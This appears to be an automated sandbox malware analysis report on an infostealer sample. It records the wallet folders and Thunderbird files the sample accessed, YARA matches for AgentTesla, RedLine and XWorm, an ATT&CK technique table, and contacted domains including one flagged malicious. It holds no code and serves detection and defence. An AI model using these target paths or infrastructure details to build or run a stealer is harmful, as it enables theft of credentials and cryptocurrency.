File opened: C:\FTP Navigator\Ftplist.txt

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\atomic\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior

Source: Yara match	File source: 6.2.AddInProcess32.exe.7200000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.AddInProcess32.exe.7200000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.1568767858.0000000007200000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 7660, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 6.2.AddInProcess32.exe.7200000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.AddInProcess32.exe.7200000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.1568767858.0000000007200000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 7660, type: MEMORYSTR

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 6.2.AddInProcess32.exe.7860000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.AddInProcess32.exe.7860000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.1570014475.0000000007860000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 7660, type: MEMORYSTR

Yara detected XWorm

Source: Yara match	File source: 0.2.RFQPO3D93876738.scr.exe.2422d0de260.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.RFQPO3D93876738.scr.exe.2422d0e70a0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.RFQPO3D93876738.scr.exe.2422d0e70a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.RFQPO3D93876738.scr.exe.2422d0de260.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.1551992222.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1554299366.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1554585677.000002422D096000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RFQPO3D93876738.scr.exe PID: 7368, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 7660, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	331 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	21 Disable or Modify Tools	2 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	311 Process Injection	1 Deobfuscate/Decode Files or Information	21 Input Capture	124 System Information Discovery	Remote Desktop Protocol	4 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Obfuscated Files or Information	Security Account Manager	441 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Software Packing	NTDS	1 Process Discovery	Distributed Component Object Model	21 Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	351 Virtualization/Sandbox Evasion	SSH	1 Clipboard Data	123 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	351 Virtualization/Sandbox Evasion	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	311 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
RFQPO3D93876738.scr.exe	29%	ReversingLabs	Win64.Infostealer.Generic
RFQPO3D93876738.scr.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/02/sc/sct	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk	0%	URL Reputation	safe
http://tempuri.org/Entity/Id23ResponseD	0%	URL Reputation	safe
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary	0%	URL Reputation	safe
http://tempuri.org/Entity/Id12Response	0%	URL Reputation	safe
http://tempuri.org/	0%	URL Reputation	safe
http://tempuri.org/Entity/Id2Response	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1	0%	URL Reputation	safe
http://tempuri.org/Entity/Id21Response	0%	URL Reputation	safe
http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap	0%	URL Reputation	safe
http://tempuri.org/Entity/Id9	0%	URL Reputation	safe
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID	0%	URL Reputation	safe
http://tempuri.org/Entity/Id8	0%	URL Reputation	safe
http://tempuri.org/Entity/Id5	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare	0%	URL Reputation	safe
http://tempuri.org/Entity/Id4	0%	URL Reputation	safe
http://tempuri.org/Entity/Id7	0%	URL Reputation	safe
http://tempuri.org/Entity/Id6	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret	0%	URL Reputation	safe
http://tempuri.org/Entity/Id19Response	0%	URL Reputation	safe
http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2004/10/wsat/fault	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2004/10/wsat	0%	URL Reputation	safe
http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey	0%	URL Reputation	safe
http://tempuri.org/Entity/Id15Response	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register	0%	URL Reputation	safe
http://tempuri.org/Entity/Id6Response	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey	0%	URL Reputation	safe
https://api.ip.sb/ip	0%	URL Reputation	safe
https://account.dyn.com/	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2004/04/sc	0%	URL Reputation	safe
http://tempuri.org/Entity/Id1ResponseD	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel	0%	URL Reputation	safe
http://tempuri.org/Entity/Id9Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id20	0%	URL Reputation	safe
http://tempuri.org/Entity/Id21	0%	URL Reputation	safe
http://tempuri.org/Entity/Id22	0%	URL Reputation	safe
http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1	0%	URL Reputation	safe
http://tempuri.org/Entity/Id23	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1	0%	URL Reputation	safe
http://tempuri.org/Entity/Id24	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue	0%	URL Reputation	safe
http://tempuri.org/Entity/Id24Response	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
http://tempuri.org/Entity/Id1Response	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego	0%	URL Reputation	safe
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2004/08/addressing	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2004/04/trust	0%	URL Reputation	safe
http://tempuri.org/Entity/Id10	0%	URL Reputation	safe
http://tempuri.org/Entity/Id11	0%	URL Reputation	safe
http://tempuri.org/Entity/Id12	0%	URL Reputation	safe
http://tempuri.org/Entity/Id16Response	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel	0%	URL Reputation	safe
http://tempuri.org/Entity/Id13	0%	URL Reputation	safe
http://tempuri.org/Entity/Id14	0%	URL Reputation	safe
http://tempuri.org/Entity/Id15	0%	URL Reputation	safe
http://tempuri.org/Entity/Id16	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce	0%	URL Reputation	safe
http://tempuri.org/Entity/Id17	0%	URL Reputation	safe
http://tempuri.org/Entity/Id18	0%	URL Reputation	safe
http://tempuri.org/Entity/Id5Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id19	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns	0%	URL Reputation	safe
http://tempuri.org/Entity/Id14ResponseD	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id10Response	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/02/trust/Renew	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id8Response	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey	0%	URL Reputation	safe
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0	0%	URL Reputation	safe
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT	0%	URL Reputation	safe
http://tempuri.org/Entity/Id6ResponseD	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id13ResponseD	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2004/08/addressing/faultp9	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id5ResponseD	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
http://r10.o.lencr.org0#	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id21ResponseD	0%	Avira URL Cloud	safe
http://r10.i.lencr.org/0	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id10ResponseD	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id15ResponseD	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id11ResponseD	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
bg.microsoft.map.fastly.net	199.232.210.172	true	false	unknown
api.ipify.org	104.26.12.205	true	false	unknown
s82.gocheapweb.com	51.195.88.199	true	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/sc/sct	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/chrome_newtab	AddInProcess32.exe, 00000006.00000002.1559282537.0000000003ECF000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	AddInProcess32.exe, 00000006.00000002.1559282537.0000000003ECF000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id14ResponseD	AddInProcess32.exe, 00000006.00000002.1554299366.0000000003035000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id23ResponseD	AddInProcess32.exe, 00000006.00000002.1554299366.0000000003035000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id12Response	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id2Response	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id21Response	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id9	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id8	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id6ResponseD	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id5	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id4	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id7	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id6	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id19Response	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id13ResponseD	AddInProcess32.exe, 00000006.00000002.1554299366.0000000003035000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat/fault	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id15Response	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id5ResponseD	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002FC2000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002E61000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/faultp9	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id6Response	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.ip.sb/ip	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000006.00000002.1570014475.0000000007860000.00000004.08000000.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
https://account.dyn.com/	AddInProcess32.exe, 00000006.00000002.1568767858.0000000007200000.00000004.08000000.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/sc	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id1ResponseD	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id9Response	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	AddInProcess32.exe, 00000006.00000002.1559282537.0000000003ECF000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id20	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://r10.o.lencr.org0#	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000006.00000002.1566188160.00000000065A1000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000006.00000002.1572651872.0000000007BD2000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000006.00000002.1554299366.000000000338A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id21	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id22	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id23	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002FC2000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id24	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id24Response	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.ecosia.org/newtab/	AddInProcess32.exe, 00000006.00000002.1559282537.0000000003ECF000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id1Response	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay	AddInProcess32.exe, 00000006.00000002.1554299366.0000000002F35000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
